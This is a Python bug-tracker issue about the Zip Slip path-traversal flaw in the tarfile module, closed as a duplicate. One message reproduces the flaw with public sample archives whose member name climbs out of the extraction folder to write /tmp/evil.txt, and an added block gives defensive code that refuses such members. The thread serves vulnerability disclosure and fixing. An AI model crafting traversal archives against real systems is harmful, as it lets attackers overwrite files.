classification
Title: Zip Slip Vulnerability
Type: security Stage: resolved
Components: Library (Lib) Versions: Python 3.8, Python 3.7, Python 3.6, Python 3.4, Python 3.5, Python 2.7
process
Status: closed Resolution: duplicate
Dependencies: Superseder: tarfile: Traversal attack vulnerability
View: 21109
Assigned To: christian.heimes Nosy List: SilentGhost, christian.heimes, jeffknupp, push0ebp, uhei3nn9
Priority: normal Keywords: security_issue

Created on 2019-02-06 09:37 by uhei3nn9, last changed 2019-02-06 10:36 by christian.heimes. This issue is now closed.

Messages (6)
msg334910 - (view) Author: uhei3nn9 (uhei3nn9) Date: 2019-02-06 09:37
As was discovered in 06.2018, the Python library is affected by the Zip Slip vulnerability (meaning code execution).

The affected section https://github.com/python/cpython/blob/3.7/Lib/tarfile.py has not been patched since then.

Therefore it seems python has not yet fixed this vulnerability.


Source:
https://github.com/snyk/zip-slip-vulnerability
msg334911 - (view) Author: Sihoon Lee (push0ebp) * Date: 2019-02-06 09:47
When I tested it before, it did not work.
Did it really work?
Could you show me your PoC code?
msg334914 - (view) Author: Jeff Knupp (jeffknupp) * Date: 2019-02-06 10:05
According to https://snyk.io/research/zip-slip-vulnerability (the source of the paper), Python hasn't been vulnerable since 2014.
msg334918 - (view) Author: SilentGhost (SilentGhost) * (Python triager) Date: 2019-02-06 10:14
issue 21109 was mentioned as an example of reported behaviour in https://github.com/snyk/zip-slip-vulnerability/issues/4#issuecomment-395848367
msg334920 - (view) Author: Christian Heimes (christian.heimes) * (Python committer) Date: 2019-02-06 10:32
You are both right and wrong. The zipfile module of Python 3.7 is fine, but the tarfile module is still vulnerable.

$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.zip
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.tar
$ mkdir /tmp/zipslip
$ cd /tmp/zipslip

Test zipfile:

$ python3
>>> import zipfile
>>> zf = zipfile.ZipFile('zip-slip.zip')
>>> zf.printdir()
File Name                                             Modified             Size
good.txt                                       2018-04-15 22:04:30           19
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 2018-04-15 22:04:42           20
>>> zf.extractall()
>>> exit()
$ find
.
./tmp
./tmp/evil.txt
./good.txt
./zip-slip.tar
./zip-slip.zip

Test tarfile

$ rm -rf good.txt tmp/
$ python3
>>> import tarfile
>>> import tarfile
>>> tf = tarfile.TarFile('zip-slip.tar')
>>> tf.list()
?rw-r--r-- grander/staff         19 2018-04-15 19:04:29 good.txt 
?rw-r--r-- grander/staff         20 2018-06-03 13:49:05 ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 
>>> tf.extractall()
# find
.
./zip-slip.tar
./good.txt
./zip-slip.zip
# cat /tmp/evil.txt 
this is an evil one
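
Added example, not part of the original thread and not CPython code: a pre-extraction check that refuses a member such as the `../` entry listed in the session above before anything is written to disk. The names UnsafeMember, check_members, safe_extract and build_sample are hypothetical, and the archive is a constructed in-memory fixture.

```python
import io
import os
import shutil
import tarfile


class UnsafeMember(Exception):
    """An archive member would be written outside the destination."""


def check_members(tf, dest):
    """Return tf's members if all of them are safe to write under dest."""
    base = os.path.realpath(dest)
    members = tf.getmembers()
    for m in members:
        # Links and device nodes are refused outright: a link extracted
        # earlier can redirect a later, innocent-looking path.
        if not (m.isfile() or m.isdir()):
            raise UnsafeMember(f"unsupported member type: {m.name!r}")
        # join() lets an absolute m.name replace dest; realpath() folds
        # ".." and existing symlinks, so both cases fail the prefix test.
        target = os.path.realpath(os.path.join(base, m.name))
        if os.path.commonpath([base, target]) != base:
            raise UnsafeMember(f"path escapes destination: {m.name!r}")
    return members


def safe_extract(tf, dest):
    """Validate every member first, then write files and directories."""
    members = check_members(tf, dest)
    for m in members:
        target = os.path.join(dest, m.name)
        if m.isdir():
            os.makedirs(target, exist_ok=True)
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with tf.extractfile(m) as src, open(target, "wb") as out:
            shutil.copyfileobj(src, out)
    return [m.name for m in members]


def build_sample(names):
    """Constructed fixture: in-memory tar with one small file per name."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name in names:
            info = tarfile.TarInfo(name)
            info.size = 7
            tf.addfile(info, io.BytesIO(b"sample\n"))
    buf.seek(0)
    return buf
```

Python 3.12 and later also ship extraction filters (PEP 706); `extractall(path, filter="data")` applies comparable checks inside the standard library.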
msg334922 - (view) Author: Christian Heimes (christian.heimes) * (Python committer) Date: 2019-02-06 10:36
Thanks for reporting the issue. I'm closing this issue as duplicate of #21109. Let's keep all discussion on one issue.
History
Date                 User              Action  Args
2019-02-06 10:36:07  christian.heimes  set     status: open -> closed; superseder: tarfile: Traversal attack vulnerability; messages: + msg334922; resolution: duplicate; stage: resolved
2019-02-06 10:32:47  christian.heimes  set     messages: + msg334920
2019-02-06 10:14:22  SilentGhost       set     nosy: + SilentGhost; messages: + msg334918
2019-02-06 10:05:28  jeffknupp         set     nosy: + jeffknupp; messages: + msg334914
2019-02-06 09:58:33  rhettinger        set     assignee: christian.heimes; nosy: + christian.heimes
2019-02-06 09:47:21  push0ebp          set     nosy: + push0ebp, - lars.gustaebel; messages: + msg334911
2019-02-06 09:45:08  SilentGhost       set     keywords: + security_issue; nosy: + lars.gustaebel
2019-02-06 09:37:04  uhei3nn9          create